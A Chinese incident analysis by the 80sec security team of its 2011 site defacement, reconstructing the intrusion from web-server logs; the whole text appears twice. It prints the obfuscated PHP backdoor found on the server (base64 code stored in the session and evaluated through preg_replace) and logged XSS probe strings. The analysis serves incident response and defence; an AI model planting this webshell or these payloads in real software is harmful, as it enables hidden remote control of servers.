80sec网站感恩节被攻击事件分析
程序员文章站
2022-07-03 11:25:21
在感恩节的晚上,我们的站点遭遇了攻击,几名未知性别的黑客成功涂改掉了我们的首页,事情发生后很多朋友对我们被攻击的原因和经过都很关心,各种猜测都有,加上我们后续对于这次攻击... 11-12-26...
[ 目录 ]
0×00 事件背景
0×01 应急响应
0×02 事件分析
0×03 事件启示
0×04 总结
0×00 事件背景
在感恩节的晚上,我们的站点遭遇了攻击,几名未知性别的黑客成功涂改掉了我们的首页,事情发生后很多朋友对我们被攻击的原因和经过都很关心,各种猜测都有,加上我们后续对于这次攻击的分析结果来看,我们觉得整次攻击和事后应急及分析的过程都适合作为一次典型的案例分析,把整件事情披露出来无论是对我们还是对业界会非常有意义,入侵者给我们在感恩节送了这么好的礼物,我们要好好接受才对:)
0×01 应急响应
事件发生之后的一段时间我们登录到服务器,由于首页替换的时间很短暂,我们甚至没有抓到截图,开始甚至都怀疑是arp欺骗或者是dns劫持之类的攻击,但是作为应急响应的箴言之一,我们最好不要相信猜测,一切以日志分析为主,一旦猜测我们从开始就输了。
我们知道在webserver的日志里记录了几乎所有有价值的信息,我们后续的检测必须依赖于日志,所以建议各位日志没开的同学先把日志打开并且保存足够长的时间,在这个有价值的信息里,我们第一个需要找准的就是攻击发生的具体时间点,因为我们是首页被黑并且时间较短,我们迅速stat了下首页文件的内容,发现完全正常没有任何改变:
file: `/home/jianxin/80sec.com/public_html/index.php’
size: 397 blocks: 8 io block: 4096 regular file
device: ca00h/51712d inode: 579843 links: 1
access: (0644/-rw-r–r–) uid: ( 1001/ jianxin) gid: ( 1001/ jianxin)
access: 2011-07-13 04:16:57.000000000 +0800
modify: 2011-07-13 04:16:55.000000000 +0800
change: 2011-10-14 17:43:32.000000000 +0800
我们知道在linux系统下面的ctime会需要权限较高才能修改,而我们的系统是最新的patch,据我们了解也应该不存在使用未公开的漏洞来攻击我们的可能,毕竟我们只是一个技术站点,难道真的是arp或者是dns劫持么?在webserver的log里有一个选项记录了这一次请求所传递的数据量,我们对比了下发现,的确在某个时间首页的数据量有一个显著的减少:
173.234.184.45 – - [24/nov/2011:20:44:13 +0800] “get / http/1.1′ 200 676 “-” “mozilla/5.0 (windows; u; windows nt 6.1; zh-cn; rv:1.9.2.24) gecko/20111103 firefox/3.6.24′
218.213.229.74 – - [24/nov/2011:20:44:26 +0800] “get / http/1.1′ 200 676 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 2.0.50727; .net clr 3.0.4506.2152;
为676字节,而一般的请求大小为
98.142.220.112 – - [25/nov/2011:00:39:32 +0800] “get / http/1.1′ 200 31831 “-” “curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 openssl/0.9.8k zlib/1.2.3.3 libidn/1.15′
31831字节,我们可以确认webserver的确出现了问题,入侵者的确能够控制我们的首页显示,到这里我们基本可以确定攻击时间和攻击的源ip了,当你被黑了的时候,第一个访问那个页面的基本就是攻击者本人,他们会迫不及待的来看攻击成果:)
既然服务器有问题了,那我们来看看今天有什么文件被修改了:
find /home/ -ctime 1
立刻我们就发现了一些好玩的东西:
session_start();
$_post['code'] && $_session['thecode'] = trim($_post['code']);
$_session['thecode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_session[\'thecode\']))','a');
看来这就是那只后门了,写到了一个全局可写的缓存文件里,而且特意做了隐藏,基本是正常的代码也不触发什么关键字,那么问题在于这么一些可爱的代码是怎么到我的服务器上的呢?这个后门我们发现最早出现的时间并不是在80sec里,而是在同一服务器上一个80sec童鞋的blog里,最早的时间可以追朔到
218.213.229.74 - - [24/nov/2011:00:12:56 +0800] "get /wp-content/wp-cache-config.php http/1.1" 200 308 "-" "mozilla/5.0 (windows nt 5.1) applewebkit/535.2 (khtml, like gecko) chrome/15.0.874.106 safari/535.2"
ip似乎也比较吻合,那么似乎假设如果没有猜错的话,第一个被攻击的目标应该是这个很勺的80sec童鞋的blog才对,那么是如何攻击的呢?我们将日志里与这个ip相关的抽取出来
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /admin1 http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /my http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /upload http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /user_login http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /upload http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /admin1 http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /conf http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /test http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /houtai http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /user_login http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /sys http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /news_admin http/1.1" 404 7978 "-" "-"
攻击很早就发生了,甚至还使用了
218.213.229.74 - - [16/nov/2011:20:29:10 +0800] "get / http/1.0" 200 37446 "-" "mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)"
218.213.229.74 - - [16/nov/2011:20:29:11 +0800] "get / http/1.0" 200 37446 "-" "mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)"
218.213.229.74 - - [16/nov/2011:20:29:11 +0800] "get / http/1.0" 200 37446 "-" "mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)"
218.213.229.74 - - [16/nov/2011:20:29:12 +0800] "get /?s= http/1.0′ 200 8620 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?s=t>alert(1499328686)%3bt> http/1.0′ 200 8667 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get / http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?p=t>alert(812396909)%3bt> http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?s=%3cimg%20dynsrc%3d%22javascript:alert%28990417228%29%3b%22%3e http/1.0′ 200 8586 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?s= http/1.0′ 200 8777 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?p= http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?p= http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:13 +0800] “get /?s= http/1.0′ 200 8816 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:13 +0800] “get /?p=%3cimg%20dynsrc%3d%22javascript:alert%288013950%29%3b%22%3e http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:13 +0800] “get / http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:13 +0800] “get /?p= http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
一个web扫描工具对站点进行了详细的扫描,连一个功能简单的开源blog都不放过,可以猜测对一般的站点每天要遭受多少蹂躏,最后攻击者开始找回密码
218.213.229.74 – - [19/nov/2011:05:25:39 +0800] “get /wp-admin/images/button-grad-active.png http/1.1′ 200 575 “http://sex1986.com/wp-login.php” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
218.213.229.74 – - [19/nov/2011:05:25:40 +0800] “post /wp-login.php http/1.1′ 200 2155 “http://sex1986.com/wp-login.php” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
218.213.229.74 – - [19/nov/2011:05:29:01 +0800] “post /wp-login.php http/1.1′ 200 2156 “http://sex1986.com/wp-login.php” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
218.213.229.74 – - [19/nov/2011:05:29:03 +0800] “get /wp-login.php?action=lostpassword http/1.1′ 200 1741 “http://sex1986.com/wp-login.php” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
218.213.229.74 – - [19/nov/2011:05:29:19 +0800] “post /wp-login.php?action=lostpassword http/1.1′ 200 2106 “http://sex1986.com/wp-login.php?action=lostpassword” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
最后,攻击者的确成功的取回了密码,然后通过这个密码进入了后台,后台的功能比较丰富然后上传了后门,在清楚攻击者的手法之后我们很快定位了原因和进行了处理,我们的服务器以较低身份运行,而程序文件权限是以属主身份运行,所以整个web目录不可写,较好的控制了入侵的范围,在对入侵者放置在各个角落里的后门处理之后,我们修改相应密码恢复了站点的运行;
0×02 事件分析
我们讨论一次入侵事件,必须要清楚相应的目的,在恢复站点运行之后,我们分析了入侵者所有的动作,大概可以总结如下这次攻击更像是针对wooyun.org的一次攻击,因为wooyun.org近期的一些事情被迁移到日本的vps,所以这可能是一次长期的持久的渗透攻击,专业点称为apt攻击,但是由于代码逻辑完全不在这台服务器上,所以攻击者失败了。
攻击者在取回邮箱密码的时候手法值得怀疑,尽管整个事件的源头是由于某个很勺的80sec童鞋,这位童鞋虽然很勺,但是绝对不使用弱口令也不会使用生日密码(我们的安全意识不像传闻的那样弱),同时这位悲催的童鞋有两个邮箱,一个邮箱是wordpess的密码找回邮箱!另外一个邮箱同样也是这个wordpress密码邮箱的密码找回邮箱!wordpess和两个邮箱的安全关联层层相扣!未知性别的感恩节攻击者采用读心术控制了我们这位很纯洁的童鞋的最后一个关键邮箱,在没有漏洞的情况下渗透进了服务器,得到了大家上面所看到的结果,很伟大,不是么?
通过一段时间的关联分析,我们发现与这次攻击相关的人都可能遭受到不同程度的牵连,包括曾经在80sec.com上注册的不少用户都通过邮箱找回了密码,而攻击的来源与此次攻击者正好相同,这里最大的问题在于,谁能够同时拥有这么多邮箱,包括163,hotmail以及gmail的密码,我们有理由相信这次攻击与国内很多大型社区的数据库失窃,与传闻的某邮箱数据库失窃有关。
攻击者所使用的后门开始有意识的进行躲避和查杀,如果不是入侵者通过缓存直接修改了首页,那么这次攻击可能隐蔽得更深更长时间,所造成的危害可能更大,对于80sec而言,我们所有的文档和技术都在站点进行分享,并没有安全级别要求较高的数据,所以可能影响不大,但是对于一些包含重要数据的企业和网站而言,同时我们事后发现攻击者所使用的ip是一家站点,很可能该家站点已经被攻陷作为跳板,如何在攻击发生和尝试发生时发现和阻止将是一件很有挑战的事情。
0×03 事件启示
在这件事情里,我们觉得对我们最有意义包括两点,一点是现有互联网认证机制的崩溃,这主要表现在目前的互联网的认证是基于电子邮件的认证,电子邮件在各个企业和互联网公司都被用作标识用户身份,而经过近几年黑客一轮又一轮的洗礼,目前国内互联网企业里含有较大用户基数的站点都可能已经沦陷,而在即使知道自己用户数据库被窃取之后大多数的企业基于自身利益原因还是会保持沉默。黑客在攒积大量的用户密码之后,就可以使得基于账户密码,基于邮箱认证的现有安全认证机制失效,这已经是现有互联网企业的灾难,请想想你们企业内部邮箱是否对外,以及邮箱是否是静态密码,如果邮箱是内部,那么vpn呢,而这种安全机制的失效又称为攻击者攒积新的数据库的基础,形成一个巨大的黑色雪球,彻底瓦解互联网安全。
另外一部分是关于apt攻击的,理论上我们只要有一个目标,基本是没有攻破不了的,特别是对于大企业而言,架构的改动,idc的扩充,企业并购和投资都可能为你的安全体系引入新的风险,如何在一个动态的环境下建设一个较为完善的安全体系,这将是安全人员面临的一个巨大挑战,因为从这一次时间里就可以看到,我们并没有因为是存在什么实际的漏洞而导致被入侵。
0×04 总结
在80sec出现问题之后,不少人猜测是漏洞还是什么原因遭受攻击,有人怀疑是安全意识问题,也有一些安全厂商询问是否可以通过waf或者其他的安全产品来避免此次安全事件,不过在事件披露之后,相信大家应该很清楚能否通过现有产品来避免此类的攻击行为,我们的安全概念需要更新了,不只是漏洞也不只是安全意识了,包括安全的理解,对攻击的理解都需要有一个全新的认识了,最后欢迎微博上某位产品安全厂商开发出能够保护我们的安全产品,也欢迎攻击者可以联系到我们看看我们的整个过程的分析是否正确
0×00 事件背景
0×01 应急响应
0×02 事件分析
0×03 事件启示
0×04 总结
0×00 事件背景
在感恩节的晚上,我们的站点遭遇了攻击,几名未知性别的黑客成功涂改掉了我们的首页,事情发生后很多朋友对我们被攻击的原因和经过都很关心,各种猜测都有,加上我们后续对于这次攻击的分析结果来看,我们觉得整次攻击和事后应急及分析的过程都适合作为一次典型的案例分析,把整件事情披露出来无论是对我们还是对业界会非常有意义,入侵者给我们在感恩节送了这么好的礼物,我们要好好接受才对:)
0×01 应急响应
事件发生之后的一段时间我们登录到服务器,由于首页替换的时间很短暂,我们甚至没有抓到截图,开始甚至都怀疑是arp欺骗或者是dns劫持之类的攻击,但是作为应急响应的箴言之一,我们最好不要相信猜测,一切以日志分析为主,一旦猜测我们从开始就输了。
我们知道在webserver的日志里记录了几乎所有有价值的信息,我们后续的检测必须依赖于日志,所以建议各位日志没开的同学先把日志打开并且保存足够长的时间,在这个有价值的信息里,我们第一个需要找准的就是攻击发生的具体时间点,因为我们是首页被黑并且时间较短,我们迅速stat了下首页文件的内容,发现完全正常没有任何改变:
file: `/home/jianxin/80sec.com/public_html/index.php’
size: 397 blocks: 8 io block: 4096 regular file
device: ca00h/51712d inode: 579843 links: 1
access: (0644/-rw-r–r–) uid: ( 1001/ jianxin) gid: ( 1001/ jianxin)
access: 2011-07-13 04:16:57.000000000 +0800
modify: 2011-07-13 04:16:55.000000000 +0800
change: 2011-10-14 17:43:32.000000000 +0800
我们知道在linux系统下面的ctime会需要权限较高才能修改,而我们的系统是最新的patch,据我们了解也应该不存在使用未公开的漏洞来攻击我们的可能,毕竟我们只是一个技术站点,难道真的是arp或者是dns劫持么?在webserver的log里有一个选项记录了这一次请求所传递的数据量,我们对比了下发现,的确在某个时间首页的数据量有一个显著的减少:
173.234.184.45 – - [24/nov/2011:20:44:13 +0800] “get / http/1.1′ 200 676 “-” “mozilla/5.0 (windows; u; windows nt 6.1; zh-cn; rv:1.9.2.24) gecko/20111103 firefox/3.6.24′
218.213.229.74 – - [24/nov/2011:20:44:26 +0800] “get / http/1.1′ 200 676 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1; .net clr 2.0.50727; .net clr 3.0.4506.2152;
为676字节,而一般的请求大小为
98.142.220.112 – - [25/nov/2011:00:39:32 +0800] “get / http/1.1′ 200 31831 “-” “curl/7.19.7 (i486-pc-linux-gnu) libcurl/7.19.7 openssl/0.9.8k zlib/1.2.3.3 libidn/1.15′
31831字节,我们可以确认webserver的确出现了问题,入侵者的确能够控制我们的首页显示,到这里我们基本可以确定攻击时间和攻击的源ip了,当你被黑了的时候,第一个访问那个页面的基本就是攻击者本人,他们会迫不及待的来看攻击成果:)
既然服务器有问题了,那我们来看看今天有什么文件被修改了:
find /home/ -ctime 1
立刻我们就发现了一些好玩的东西:
session_start();
$_post['code'] && $_session['thecode'] = trim($_post['code']);
$_session['thecode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_session[\'thecode\']))','a');
看来这就是那只后门了,写到了一个全局可写的缓存文件里,而且特意做了隐藏,基本是正常的代码也不触发什么关键字,那么问题在于这么一些可爱的代码是怎么到我的服务器上的呢?这个后门我们发现最早出现的时间并不是在80sec里,而是在同一服务器上一个80sec童鞋的blog里,最早的时间可以追朔到
218.213.229.74 - - [24/nov/2011:00:12:56 +0800] "get /wp-content/wp-cache-config.php http/1.1" 200 308 "-" "mozilla/5.0 (windows nt 5.1) applewebkit/535.2 (khtml, like gecko) chrome/15.0.874.106 safari/535.2"
ip似乎也比较吻合,那么似乎假设如果没有猜错的话,第一个被攻击的目标应该是这个很勺的80sec童鞋的blog才对,那么是如何攻击的呢?我们将日志里与这个ip相关的抽取出来
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /admin1 http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /my http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /upload http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /user_login http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:02 +0800] "get /upload http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /admin1 http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /conf http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /test http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /houtai http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /user_login http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /sys http/1.1" 404 7978 "-" "-"
218.213.229.74 - - [16/nov/2011:19:10:03 +0800] "get /news_admin http/1.1" 404 7978 "-" "-"
攻击很早就发生了,甚至还使用了
218.213.229.74 - - [16/nov/2011:20:29:10 +0800] "get / http/1.0" 200 37446 "-" "mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)"
218.213.229.74 - - [16/nov/2011:20:29:11 +0800] "get / http/1.0" 200 37446 "-" "mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)"
218.213.229.74 - - [16/nov/2011:20:29:11 +0800] "get / http/1.0" 200 37446 "-" "mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)"
218.213.229.74 - - [16/nov/2011:20:29:12 +0800] "get /?s= http/1.0′ 200 8620 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?s=t>alert(1499328686)%3bt> http/1.0′ 200 8667 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get / http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?p=t>alert(812396909)%3bt> http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?s=%3cimg%20dynsrc%3d%22javascript:alert%28990417228%29%3b%22%3e http/1.0′ 200 8586 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?s= http/1.0′ 200 8777 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?p= http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:12 +0800] “get /?p= http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:13 +0800] “get /?s= http/1.0′ 200 8816 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:13 +0800] “get /?p=%3cimg%20dynsrc%3d%22javascript:alert%288013950%29%3b%22%3e http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:13 +0800] “get / http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
218.213.229.74 – - [16/nov/2011:20:29:13 +0800] “get /?p= http/1.0′ 200 37446 “-” “mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; .net clr 1.1.4322)”
一个web扫描工具对站点进行了详细的扫描,连一个功能简单的开源blog都不放过,可以猜测对一般的站点每天要遭受多少蹂躏,最后攻击者开始找回密码
218.213.229.74 – - [19/nov/2011:05:25:39 +0800] “get /wp-admin/images/button-grad-active.png http/1.1′ 200 575 “http://sex1986.com/wp-login.php” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
218.213.229.74 – - [19/nov/2011:05:25:40 +0800] “post /wp-login.php http/1.1′ 200 2155 “http://sex1986.com/wp-login.php” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
218.213.229.74 – - [19/nov/2011:05:29:01 +0800] “post /wp-login.php http/1.1′ 200 2156 “http://sex1986.com/wp-login.php” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
218.213.229.74 – - [19/nov/2011:05:29:03 +0800] “get /wp-login.php?action=lostpassword http/1.1′ 200 1741 “http://sex1986.com/wp-login.php” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
218.213.229.74 – - [19/nov/2011:05:29:19 +0800] “post /wp-login.php?action=lostpassword http/1.1′ 200 2106 “http://sex1986.com/wp-login.php?action=lostpassword” “mozilla/5.0 (windows nt 5.1) applewebkit/535.1 (khtml, like gecko) chrome/13.0.772.0 safari/535.1′
最后,攻击者的确成功的取回了密码,然后通过这个密码进入了后台,后台的功能比较丰富然后上传了后门,在清楚攻击者的手法之后我们很快定位了原因和进行了处理,我们的服务器以较低身份运行,而程序文件权限是以属主身份运行,所以整个web目录不可写,较好的控制了入侵的范围,在对入侵者放置在各个角落里的后门处理之后,我们修改相应密码恢复了站点的运行;
0×02 事件分析
我们讨论一次入侵事件,必须要清楚相应的目的,在恢复站点运行之后,我们分析了入侵者所有的动作,大概可以总结如下这次攻击更像是针对wooyun.org的一次攻击,因为wooyun.org近期的一些事情被迁移到日本的vps,所以这可能是一次长期的持久的渗透攻击,专业点称为apt攻击,但是由于代码逻辑完全不在这台服务器上,所以攻击者失败了。
攻击者在取回邮箱密码的时候手法值得怀疑,尽管整个事件的源头是由于某个很勺的80sec童鞋,这位童鞋虽然很勺,但是绝对不使用弱口令也不会使用生日密码(我们的安全意识不像传闻的那样弱),同时这位悲催的童鞋有两个邮箱,一个邮箱是wordpess的密码找回邮箱!另外一个邮箱同样也是这个wordpress密码邮箱的密码找回邮箱!wordpess和两个邮箱的安全关联层层相扣!未知性别的感恩节攻击者采用读心术控制了我们这位很纯洁的童鞋的最后一个关键邮箱,在没有漏洞的情况下渗透进了服务器,得到了大家上面所看到的结果,很伟大,不是么?
通过一段时间的关联分析,我们发现与这次攻击相关的人都可能遭受到不同程度的牵连,包括曾经在80sec.com上注册的不少用户都通过邮箱找回了密码,而攻击的来源与此次攻击者正好相同,这里最大的问题在于,谁能够同时拥有这么多邮箱,包括163,hotmail以及gmail的密码,我们有理由相信这次攻击与国内很多大型社区的数据库失窃,与传闻的某邮箱数据库失窃有关。
攻击者所使用的后门开始有意识的进行躲避和查杀,如果不是入侵者通过缓存直接修改了首页,那么这次攻击可能隐蔽得更深更长时间,所造成的危害可能更大,对于80sec而言,我们所有的文档和技术都在站点进行分享,并没有安全级别要求较高的数据,所以可能影响不大,但是对于一些包含重要数据的企业和网站而言,同时我们事后发现攻击者所使用的ip是一家站点,很可能该家站点已经被攻陷作为跳板,如何在攻击发生和尝试发生时发现和阻止将是一件很有挑战的事情。
0×03 事件启示
在这件事情里,我们觉得对我们最有意义包括两点,一点是现有互联网认证机制的崩溃,这主要表现在目前的互联网的认证是基于电子邮件的认证,电子邮件在各个企业和互联网公司都被用作标识用户身份,而经过近几年黑客一轮又一轮的洗礼,目前国内互联网企业里含有较大用户基数的站点都可能已经沦陷,而在即使知道自己用户数据库被窃取之后大多数的企业基于自身利益原因还是会保持沉默。黑客在攒积大量的用户密码之后,就可以使得基于账户密码,基于邮箱认证的现有安全认证机制失效,这已经是现有互联网企业的灾难,请想想你们企业内部邮箱是否对外,以及邮箱是否是静态密码,如果邮箱是内部,那么vpn呢,而这种安全机制的失效又称为攻击者攒积新的数据库的基础,形成一个巨大的黑色雪球,彻底瓦解互联网安全。
另外一部分是关于apt攻击的,理论上我们只要有一个目标,基本是没有攻破不了的,特别是对于大企业而言,架构的改动,idc的扩充,企业并购和投资都可能为你的安全体系引入新的风险,如何在一个动态的环境下建设一个较为完善的安全体系,这将是安全人员面临的一个巨大挑战,因为从这一次时间里就可以看到,我们并没有因为是存在什么实际的漏洞而导致被入侵。
0×04 总结
在80sec出现问题之后,不少人猜测是漏洞还是什么原因遭受攻击,有人怀疑是安全意识问题,也有一些安全厂商询问是否可以通过waf或者其他的安全产品来避免此次安全事件,不过在事件披露之后,相信大家应该很清楚能否通过现有产品来避免此类的攻击行为,我们的安全概念需要更新了,不只是漏洞也不只是安全意识了,包括安全的理解,对攻击的理解都需要有一个全新的认识了,最后欢迎微博上某位产品安全厂商开发出能够保护我们的安全产品,也欢迎攻击者可以联系到我们看看我们的整个过程的分析是否正确